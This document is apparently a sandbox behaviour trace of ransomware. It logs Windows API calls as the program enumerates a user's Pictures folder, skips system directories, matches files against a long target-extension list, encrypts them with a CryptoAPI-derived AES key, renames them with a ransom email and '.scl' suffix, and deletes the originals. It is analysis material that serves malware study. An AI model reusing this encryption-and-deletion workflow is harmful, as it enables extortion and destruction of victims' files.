	[0195.367] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\*.*", lpSrch="program files (x86)") returned 0x0
	[0195.367] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0195.368] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\*.*", lpSrch="appdata") returned 0x0
	[0195.368] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0195.368] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\*.*", lpSrch="application data") returned 0x0
	[0195.368] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0195.368] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\*.*", lpSrch="winnt") returned 0x0
	[0195.368] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0195.368] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\*.*", lpSrch="tmp") returned 0x0
	[0195.368] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0195.369] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\*.*", lpSrch="cache") returned 0x0
	[0195.369] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0195.369] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\*.*", lpSrch="temporary internet files") returned 0x0
	[0195.369] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0195.372] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\*.*", lpSrch="webcache") returned 0x0
	[0195.372] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0195.372] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\*.*", lpSrch="inetcache") returned 0x0
	[0195.372] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0195.372] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\*.*", lpSrch="nvidia") returned 0x0
	[0195.372] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0195.373] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\*.*", lpSrch="packages") returned 0x0
	[0195.373] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0195.373] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\*.*", lpSrch="cookies") returned 0x0
	[0195.373] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0195.373] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\*.*", lpSrch="programdata") returned 0x0
	[0195.373] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x891a8d32, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x891a8d32, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0195.373] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7611b240, ftCreationTime.dwHighDateTime=0x1d970d0, ftLastAccessTime.dwLowDateTime=0x3bcb5b70, ftLastAccessTime.dwHighDateTime=0x1d97604, ftLastWriteTime.dwLowDateTime=0x3bcb5b70, ftLastWriteTime.dwHighDateTime=0x1d97604, nFileSizeHigh=0x0, nFileSizeLow=0x15a85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3PdcwV86.jpg", cAlternateFileName="")) returned 1
	[0195.373] lstrcmpW (lpString1="3PdcwV86.jpg", lpString2="..") returned 1
	[0195.374] lstrcmpW (lpString1="3PdcwV86.jpg", lpString2=".") returned 1
	[0195.374] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\RDhJ0CNFevzX\\Pictures\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures\\"
	[0195.374] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\", lpString2="3PdcwV86.jpg" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\3PdcwV86.jpg") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures\\3PdcwV86.jpg"
	[0195.374] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Pictures\\3PdcwV86.jpg") returned 43
	[0195.374] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0195.374] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Pictures\\3PdcwV86.jpg", cchLength=0x2b | out: lpsz="c:\\users\\rdhj0cnfevzx\\pictures\\3pdcwv86.jpg") returned 0x2b
	[0195.374] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0195.374] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\3pdcwv86.jpg", lpSrch="help_decrypt_your_files") returned 0x0
	[0195.375] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\rdhj0cnfevzx\\pictures\\3pdcwv86.jpg" | out: lpString1="c:\\users\\rdhj0cnfevzx\\pictures\\3pdcwv86.jpg") returned="c:\\users\\rdhj0cnfevzx\\pictures\\3pdcwv86.jpg"
	[0195.375] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\pictures\\3pdcwv86.jpg") returned 43
	[0195.375] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0195.375] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0195.375] StrStrW (lpFirst=".jpg", lpSrch=".") returned=".jpg"
	[0195.375] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0195.376] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".jpg") returned=".jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0195.376] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0195.376] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0195.376] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\3pdcwv86.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\3pdcwv86.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0195.380] ReadFile (in: hFile=0x384, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x15a85, lpNumberOfBytesRead=0x18c060, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18c060*=0x15a85, lpOverlapped=0x0) returned 1
	[0195.385] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.386] CryptAcquireContextW (in: phProv=0x18bc10, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18bc10*=0xfcba18) returned 1
	[0195.387] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.388] CryptCreateHash (in: hProv=0xfcba18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18bc14 | out: phHash=0x18bc14) returned 1
	[0195.388] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.388] CryptHashData (hHash=0xfb98f0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0195.388] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.388] CryptDeriveKey (in: hProv=0xfcba18, Algid=0x6610, hBaseData=0xfb98f0, dwFlags=0x1, phKey=0x18bc18 | out: phKey=0x18bc18*=0xfb9b30) returned 1
	[0195.388] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.388] CryptEncrypt (in: hKey=0xfb9b30, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18bc2c*=0x15a85, dwBufLen=0x15a85 | out: pbData=0x0*, pdwDataLen=0x18bc2c*=0x15a90) returned 1
	[0195.391] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0195.391] RtlMoveMemory (in: Destination=0xff2c10, Source=0xfdd180, Length=0x15a85 | out: Destination=0xff2c10) 
	[0195.391] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.391] CryptEncrypt (in: hKey=0xfb9b30, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xff2c10*, pdwDataLen=0x18bc0c*=0x15a85, dwBufLen=0x15a90 | out: pbData=0xff2c10*, pdwDataLen=0x18bc0c*=0x15a90) returned 1
	[0195.393] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.393] CryptDestroyKey (hKey=0xfb9b30) returned 1
	[0195.393] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.393] CryptDestroyHash (hHash=0xfb98f0) returned 1
	[0195.394] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.394] CryptReleaseContext (hProv=0xfcba18, dwFlags=0x0) returned 1
	[0195.394] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0195.394] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18bc28, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18bc28*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0195.394] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.395] GetUserNameA (in: lpBuffer=0x18bb0c, pcbBuffer=0x18bc24 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18bc24) returned 1
	[0195.397] wsprintfW (in: param_1=0x18bc40, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\pictures\\3pdcwv86.jpg.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 85
	[0195.397] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\3pdcwv86.jpg.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\3pdcwv86.jpg.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0195.397] WriteFile (in: hFile=0x2c0, lpBuffer=0xff2c10*, nNumberOfBytesToWrite=0x15a90, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0xff2c10*, lpNumberOfBytesWritten=0x18c068*=0x15a90, lpOverlapped=0x0) returned 1
	[0195.404] CloseHandle (hObject=0x2c0) returned 1
	[0195.404] CloseHandle (hObject=0x384) returned 1
	[0195.404] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\3pdcwv86.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\3pdcwv86.jpg")) returned 1
	[0195.412] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\3pdcwv86.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\3pdcwv86.jpg")) returned 0
	[0195.413] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7e9fdf40, ftCreationTime.dwHighDateTime=0x1d9758f, ftLastAccessTime.dwLowDateTime=0x698fd70, ftLastAccessTime.dwHighDateTime=0x1d975cf, ftLastWriteTime.dwLowDateTime=0x698fd70, ftLastWriteTime.dwHighDateTime=0x1d975cf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5KqhPE_Jl-uI", cAlternateFileName="5KQHPE~1")) returned 1
	[0195.413] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4ff03400, ftCreationTime.dwHighDateTime=0x1d974cd, ftLastAccessTime.dwLowDateTime=0x449a7e60, ftLastAccessTime.dwHighDateTime=0x1d974f7, ftLastWriteTime.dwLowDateTime=0x449a7e60, ftLastWriteTime.dwHighDateTime=0x1d974f7, nFileSizeHigh=0x0, nFileSizeLow=0x12491, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7AqVlOwxB6roLd9vRiA4.png", cAlternateFileName="7AQVLO~1.PNG")) returned 1
	[0195.413] lstrcmpW (lpString1="7AqVlOwxB6roLd9vRiA4.png", lpString2="..") returned 1
	[0195.413] lstrcmpW (lpString1="7AqVlOwxB6roLd9vRiA4.png", lpString2=".") returned 1
	[0195.413] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\RDhJ0CNFevzX\\Pictures\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures\\"
	[0195.413] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\", lpString2="7AqVlOwxB6roLd9vRiA4.png" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\7AqVlOwxB6roLd9vRiA4.png") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures\\7AqVlOwxB6roLd9vRiA4.png"
	[0195.413] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Pictures\\7AqVlOwxB6roLd9vRiA4.png") returned 55
	[0195.413] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0195.414] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Pictures\\7AqVlOwxB6roLd9vRiA4.png", cchLength=0x37 | out: lpsz="c:\\users\\rdhj0cnfevzx\\pictures\\7aqvlowxb6rold9vria4.png") returned 0x37
	[0195.414] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0195.414] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\7aqvlowxb6rold9vria4.png", lpSrch="help_decrypt_your_files") returned 0x0
	[0195.414] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\rdhj0cnfevzx\\pictures\\7aqvlowxb6rold9vria4.png" | out: lpString1="c:\\users\\rdhj0cnfevzx\\pictures\\7aqvlowxb6rold9vria4.png") returned="c:\\users\\rdhj0cnfevzx\\pictures\\7aqvlowxb6rold9vria4.png"
	[0195.414] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\pictures\\7aqvlowxb6rold9vria4.png") returned 55
	[0195.414] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0195.415] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0195.415] StrStrW (lpFirst=".png", lpSrch=".") returned=".png"
	[0195.415] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0195.415] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fd